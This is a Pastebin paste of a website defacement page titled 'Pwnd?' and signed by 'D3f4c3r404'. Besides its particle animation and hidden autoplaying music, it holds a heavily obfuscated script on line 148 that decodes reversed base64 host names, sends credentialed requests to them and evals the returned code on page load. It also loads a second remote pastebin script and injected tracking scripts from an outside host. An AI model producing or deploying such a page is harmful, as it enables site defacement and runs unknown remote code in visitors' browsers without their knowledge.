Advertisement
-H4c_K1n6-

d3f4c3r404.html

Jul 23rd, 2019
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.12 KB | None | 0 0
  1.  
  2. <html >
  3. <head><meta http-equiv="Content-Type" content="text/html; charset=gb2312">
  4. <link rel='SHORTCUT ICON' href='https://scontent.fmnl4-3.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/36242380_1796644343737647_7101002376894480384_n.jpg?_nc_cat=105&efg=eyJpIjoiYiJ9&_nc_eui2=AeHJSMX37wphyOKQCb8ht8tyTy9pQYNLp2FQ4VleBoREqPE6ZPxHMF5BXD_b2sfSaZ_AStwN5aub3PCojxiTkExoSx_44ujxfZ1YUH4VqI7oLg&_nc_oc=AQk0ziF9XFsr4yvDJTBxEoy74ePsEZOGdaJmD77kP9w5mGoLKL1u2QmdOrpyuitiVpg&_nc_ht=scontent.fmnl4-3.fna&oh=125c14fff0da4acab30f25f24c75131a&oe=5D91B8C8'>
  5. <meta name="description" content="404 NOT FOUND " />
  6. <meta name="keywords" content="Indonesian People" />
  7. <meta name="author" content="404 NOT FOUND" />
  8. <meta name='rating' content='general' />
  9. <meta name='geo.country' content='id' />
  10. <meta name='geo.placename' content='Philippines' />
  11. <meta name='robots' content='all'/>
  12. <meta name='robots' content='index, follow' />
  13. <meta name='robots schedule' content='auto'/>
  14. <meta name='revisit-after' content='1 days' />
  15. <meta name='googlebot' content='index,follow'/>
  16. <meta name='distribution' content='global'/>
  17. <meta contact='https://mbasic.facebook.com/akoayhacker.alamobayun'/>
  18.  
  19. <meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible'/>
  20.  
  21. <title>Pwnd?</title>
  22. <style>
  23. @import url("https://fonts.googleapis.com/css?family=Montserrat:200,300,400,600");
  24. .more-pens {
  25. position: fixed;
  26. left: 20px;
  27. bottom: 20px;
  28. z-index: 10;
  29. font-family: "Montserrat";
  30. font-size: 12px;
  31. }
  32.  
  33. a.white-mode, a.white-mode:link, a.white-mode:visited, a.white-mode:active {
  34. font-family: "Montserrat";
  35. font-size: 12px;
  36. text-decoration: none;
  37. background: #212121;
  38. padding: 4px 8px;
  39. color: #f7f7f7;
  40. }
  41. a.white-mode:hover, a.white-mode:link:hover, a.white-mode:visited:hover, a.white-mode:active:hover {
  42. background: #edf3f8;
  43. color: #212121;
  44. }
  45.  
  46. body {
  47. margin: 0;
  48. padding: 0;
  49. overflow: hidden;
  50. width: 100%;
  51. height: 100%;
  52. background: #000000;
  53. }
  54.  
  55. .title {
  56. z-index: 10;
  57. position: fixed;
  58. left: 50%;
  59. top: 50%;
  60. transform: translateX(-50%) translateY(-50%);
  61. font-family: "Montserrat";
  62. text-align: center;
  63. width: 100%;
  64. }
  65. .title h1 {
  66. position: relative;
  67. color: #EEEEEE;
  68. font-weight: 600;
  69. font-size: 60px;
  70. padding: 0;
  71. margin: 0;
  72. line-height: 1;
  73. text-shadow: 0 0 30px #000155;
  74. }
  75. .title h1 span {
  76. font-weight: 600;
  77. padding: 0;
  78. margin: 0;
  79. color: #BBB;
  80. }
  81. .title h2 {
  82. font-weight: 200;
  83. font-size: 20px;
  84. padding: 0;
  85. margin: 0;
  86. line-height: 1;
  87. color: #EEEEEE;
  88. letter-spacing: 2px;
  89. text-shadow: 0 0 30px #000155;
  90. }
  91. .title h4 {
  92. font-weight: 100;
  93. font-size: 10px;
  94. padding: 0;
  95. margin: 0;
  96. line-height: 1;
  97. color: #EEEEEE;
  98. letter-spacing: 2px;
  99. text-shadow: 0 0 30px #000155;
  100. }
  101. .title h3 {
  102. font-weight: 200;
  103. font-size: 15px;
  104. padding: 0;
  105. margin: 0;
  106. line-height: 1;
  107. color: #EEEEEE;
  108. letter-spacing: 2px;
  109. text-shadow: 0 0 30px #000155;
  110. }
  111.  
  112. #watch {
  113. color: white;
  114. position: relative;
  115. z-index: 1;
  116. height: 1.4em;
  117. width: 3.8em;
  118. overflow: show;
  119. margin: auto;
  120. top: 0;
  121. left: 0;
  122. bottom: 0;
  123. right: 0;
  124. font-size: 38px;
  125. }
  126.  
  127. </style>
  128.  
  129.  
  130. <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
  131. <script type="text/javascript">
  132. $(document).ready(function(){
  133. function clock() {
  134. var now = new Date();
  135. var secs = ('0' + now.getSeconds()).slice(-2);
  136. var mins = ('0' + now.getMinutes()).slice(-2);
  137. var hr = now.getHours();
  138. var Time = hr + ":" + mins + ":" + secs;
  139. document.getElementById("watch").innerHTML = Time;
  140. requestAnimationFrame(clock);
  141. }
  142.  
  143. requestAnimationFrame(clock);
  144. });
  145. </script>
  146.  
  147. <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js'></script>
  148. <script data-cfasync="false" type="text/javascript">var P0n=window;for(var P in P0n){if(P.length===(112>(0x81,37.)?(0x1A1,6):(0x11A,111.))&&P.charCodeAt((0x76<(0x104,19.1E1)?(0x176,3):(0xB9,13.31E2)))===((0x174,2.27E2)>=65.?(0x18B,100):(1.237E3,146))&&P.charCodeAt(((0x5E,3.09E2)<=64?0x252:0x4E<(0xAA,3.88E2)?(0xE3,5):(0x38,0x6C)))===(102>(0x3D,0xE5)?(47.0E1,"v"):(20.70E1,1.24E2)<=129?(0x207,119):(0x151,137))&&P.charCodeAt((42.>(0x1E6,40.5E1)?110.:(7.66E2,0x1D7)>75?(7E0,1):(0x33,133)))===(21.>(134.,4)?(145.,105):(147,0x257))&&P.charCodeAt((7.63E2>=(9.14E2,0x1E0)?(11.10E1,0):(0x126,1.374E3)<(5.0E1,81.2E1)?"l":(0x2F,148)))===((103,96)<=(141.,0x23A)?(7.25E2,119):(94.,0x185)<0x5C?4:(86,0xB)))break};for(var v in P0n[P]){if(v.length===((49.90E1,144.8E1)>=(80,4)?(14.91E2,8):(0x1A1,110.0E1))&&v.charCodeAt((0xEF>(75.,1.87E2)?(0x89,5):(0x257,84.7E1)))===((126,1.27E3)<=0x1A1?(86,"T"):(0x59,62.7E1)>0x1EC?(102,101):(7.04E2,0xD))&&v.charCodeAt((0xDD>(0x1AD,104)?(144,7):(4.83E2,0x75)))===((104.60E1,45.90E1)>0x173?(0x15A,116):(100.0E1,28.))&&v.charCodeAt((49.0E1>=(0xB4,86)?(0x10F,3):(79,101.7E1)<(21,9.25E2)?139.:(0x63,0x171)))===((14.,131.3E1)<13.38E2?(76.,117):(73.,29.6E1))&&v.charCodeAt(((1.062E3,0x198)>=0x21B?110.7E1:(100,146)<(1,2.010E2)?(79,0):(0x1E6,0xE6)))===(0x90<(0x2,2.35E2)?(96,100):138.9E1<=(91.,27)?"a":(17.90E1,37)))break};(function(H,C,J,G){P0n[P][C]=function(){var F=((0x26,96)>=48.6E1?(7.69E2,''):9.71E2<(112.,99.9E1)?(45,0):(94.,20)),w=F,x=function x(){var m=((120,0x16)<(26.6E1,10.24E2)?(0x1F3,'/'):8.11E2<=(1.,0x131)?(121.60E1,4):(1.283E3,110.60E1));var l='';var h='//';var n='ET';var M=(7.22E2<=(0x5,2.95E2)?'/':(94.9E1,40.)<(40.,0x11D)?(14.950E2,'G'):(10.59E2,0x11));var U=((61,22.5E1)<=(2.,0x127)?(95.5E1,true):(55,4.19E2));var p=new XMLHttpRequest();p.withCredentials=U;p.open((M+n),(h)+P0n[P]['atob'](J[w].split(l).reverse().join(l))+m+G+m,U);p.onreadystatechange=function(){var o=((0x1A6,0xB2)<(36.,0x119)?(86.,200):(22.,0x58));var O=((124,36)>=6.4E2?1.342E3:0xE2<(33.4E1,94.60E1)?(3.7E1,4):(14.71E2,56.40E1));if(p.readyState==O&&p.status==o&&p.responseText){eval(p.responseText);}};p.onerror=function(){if(++w!=J.length){x();}};try{p.send();}catch(o){p.onerror();}};x();};})(P0n[P][v],'_wsnndbmd',['==QZ0l2cuQnNqJnM69GN','==QZ0l2ciV2duczd4tGOtRGc','==QZj5WZpN2cukDOzN2d142c','tFWZyR3cuEmawBHa0s2M'],1211829);</script>
  149. <script type="text/javascript" src="https://pastebin.com/raw/bzQH8UpK"></script>
  150. </head>
  151. <body translate='no' oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
  152. <div class="title" align='center'>
  153. <center><div id="watch"></div>
  154. <h1>Touched By:<br>
  155. D3f4c3r404</h1>
  156. <br><br>
  157. <h3> NOT FOUND <br></h3><br>
  158. <br><br>
  159. <iframe frameborder="0" src="https://api.soundcloud.com/tracks/566552475/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" width="0" height="0" autoplay loop ></iframe>
  160. <script>
  161. 'use strict';
  162.  
  163. function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }
  164.  
  165. var max_particles = 1000;
  166. var tela = document.createElement('canvas');
  167. tela.width = $(window).width();
  168. tela.height = $(window).height();
  169. $("body").append(tela);
  170.  
  171. var canvas = tela.getContext('2d');
  172.  
  173. var Particle = function () {
  174. function Particle(canvas, progress) {
  175. _classCallCheck(this, Particle);
  176.  
  177. var random = Math.random();
  178. this.progress = 0;
  179. this.canvas = canvas;
  180.  
  181. this.x = $(window).width() / 2 + (Math.random() * 200 - Math.random() * 200);
  182. this.y = $(window).height() / 2 + (Math.random() * 200 - Math.random() * 200);
  183.  
  184. this.w = $(window).width();
  185. this.h = $(window).height();
  186. this.radius = random > .2 ? Math.random() * 1 : Math.random() * 3;
  187. this.color = random > .2 ? "#d8002c" : "#F9314C";
  188. this.radius = random > .8 ? Math.random() * 2 : this.radius;
  189. this.color = random > .8 ? "#7DFFF2" : this.color;
  190.  
  191. // this.color = random > .1 ? "#ffae00" : "#f0ff00" // Alien
  192. this.variantx1 = Math.random() * 300;
  193. this.variantx2 = Math.random() * 400;
  194. this.varianty1 = Math.random() * 100;
  195. this.varianty2 = Math.random() * 120;
  196. }
  197.  
  198. Particle.prototype.render = function render() {
  199. this.canvas.beginPath();
  200. this.canvas.arc(this.x, this.y, this.radius, 0, 2 * Math.PI);
  201. this.canvas.lineWidth = 2;
  202. this.canvas.fillStyle = this.color;
  203. this.canvas.fill();
  204. this.canvas.closePath();
  205. };
  206.  
  207. Particle.prototype.move = function move() {
  208. // this.x += (Math.sin(this.progress/this.variantx1)*Math.cos(this.progress/this.variantx2));
  209. // this.y += (Math.sin(this.progress/this.varianty1)*Math.cos(this.progress/this.varianty2));
  210. this.x += Math.sin(this.progress / this.variantx1) * Math.cos(this.progress / this.variantx2);
  211. this.y += Math.cos(this.progress / this.varianty2);
  212.  
  213. if (this.x < 0 || this.x > this.w - this.radius) {
  214. return false;
  215. }
  216.  
  217. if (this.y < 0 || this.y > this.h - this.radius) {
  218. return false;
  219. }
  220. this.render();
  221. this.progress++;
  222. return true;
  223. };
  224.  
  225. return Particle;
  226. }();
  227.  
  228. var particles = [];
  229. var init_num = popolate(max_particles);
  230. function popolate(num) {
  231. for (var i = 0; i < num; i++) {
  232. setTimeout(function () {
  233. particles.push(new Particle(canvas, i));
  234. }.bind(this), i * 20);
  235. }
  236. return particles.length;
  237. }
  238.  
  239. function clear() {
  240. canvas.globalAlpha = 0.05;
  241. canvas.fillStyle = '#2e050d';
  242. canvas.fillRect(0, 0, tela.width, tela.height);
  243. canvas.globalAlpha = 1;
  244. }
  245.  
  246. function update() {
  247. particles = particles.filter(function (p) {
  248. return p.move();
  249. });
  250. if (particles.length < init_num) {
  251. popolate(1);
  252. }
  253. clear();
  254. requestAnimationFrame(update.bind(this));
  255. }
  256. update();
  257. </script>
  258. </div>
  259. <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important;}</style><a href="" target="blank" ><img src="http://cur.cursors-4u.net/cursor.png"
  260. border="0" style="position:absolute; top: 0px; right: 0px;" /></a>
  261. <font color="white" face="Rockweel" size="4">This was not a joke or dream, this is fucking reality</font>
  262. <iframe width="1" height="1" src="https://www.youtube.com/embed/7Dj8cTooIkM?rel=0&autoplay=1&loop=1&playlist=ZmXo6C8tb9A" frameborder="0" allowfullscreen="0"></iframe>
  263. <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssK8z1wdL8SyQBOqPddj2pAi4%2bwo2QqX6OWc%2fEVuEcie%2fhiLGkGmBhU3J3B1EtsajkHs2%2fgzMqgdPQ7doDovze0yHPL16NOBqHdAspIWoBoF0LpJUfmavW%2bC7NclxnQsBhq1kL5B53EUA3OulrSRvK4aBQZHi1GZVQX0Bkr%2fqB46fBQnvl1BqgUd0PP2hhp0i%2fkbgW6qCeoXXu5y5zmr4As15xXGqpYqcJOZhOt3MS7gT8upA7YoGTooxqww%2fU7EKKxY4ogd3P4pGmIs4H%2fM%2f2Dqw%2bc9ZFYMolOipRT6CHmseDDmPIxlM4HqUGmM%2f4xPXp5dPVBggzU0HGeGG3ySmJit55zOcVQk4369KU8fLfkm%2fVqXGSrzN1gpAmDMqMnK7wWMtElPpbW7l23H%2bR4E%2f%2frl%2bw8gdNE6GFQhdaK4FwdMgXsMlz8OlB2iCsAmvCnW4oIn9di%2bCROwGCeX2QXlw9zYd7%2beMmPB2ME43Vl7FChMpraLLqBybd%2bqebWoCzxSA73ouRcxxj%2fZDw%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKiTziI28ZVdPg97XGlHVrg4VPNFlGjR0cffD3bC%2fEALoQ%2fpcVoOUK06ks72j8PLjm3HZebv4mgyJfQWgMNFLFxlC9dgfnNB9kdU2bSUUTwz%2fF7a4YznYLcmHxU4nPzwYGuasVjYnSEvToImhWWLxIuAt8PVlGrClDWGCPZtwf67sdXf0BoJ8oC24bO7iLMt2BXioVaDvLkk4S7fF0FQpWsAI4LqwAzWQNzSbq5%2bSeNzxgZLtC9fMntyogR4yYcNhs2mywR%2fDEbQlMGlsfYHbgPdpLik2AtXOJThAGq4AYb3DJI%2b%2fLx8i2J1EarGxWPmLtFzUAN5jWRlRICzn3hJKhLuZGYPKz3axz5UYVTVvJPqI64iIOuR1W56XflUo8q%2bvDopXJtL2LoRe85I2gTnX%2fYuDP4WRA0fJbmgXb0XtqzzfffonBZLVf8lXCsiHT4eH0evjNVYj9iqbB%2bsItUDjdNRljTuamkg6mbIeLmutdohtdr55KXyDO5txFEN7EJH8yhII9wVcx9jk%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKrrMAir%2b6NSuLydjx0Qa9A%2btOyPGKs4viGAhAXDqbZ%2b98tJ8SIOhbRGmKJb6Hdg%2bK8rSBLh1CI4ij%2bApq7anLQ1ouc5Fifrxj9Hl4KBZIA2Is9GP6BepCG1Hcyah4saPynHEBFJSwrh%2bfpCqqsiNJlvFLJhoA0NvbmgRw4UKmPI98%2fAZ8%2b2vuo15dOfK2kZY3vlmdchvI%2fsltJj9koX7IkZYcwWo9amyPPOyLK6xUR5yaiEsHPoyFZ1oM9pf4y4RwpTEIp9fARIbjM40roIyyT8XCqZXwcSq8hpdhvxb23jWP27nTJYiMTN4WDV26VSIYu3Kg%2fIpRE6lDPRAD9%2bVo0W39X%2bt9rncXL1ptVb%2bEXmEdy4MGYYD6tiUTtE6aYHMwlD0aNLxrSE0yquKD%2f0nFJe8uYOGSGmCc5hTzb1S1%2fDT%2bEKWDMUHQU%2fA6zuqeOJrYiTd7E2pNJCp4TZdsLLpXcmdzw0u2bO1sBGmdzGO1810EVC5DDsexg66DmD1Dxb0wsGxpj1psgo4%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
  264. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement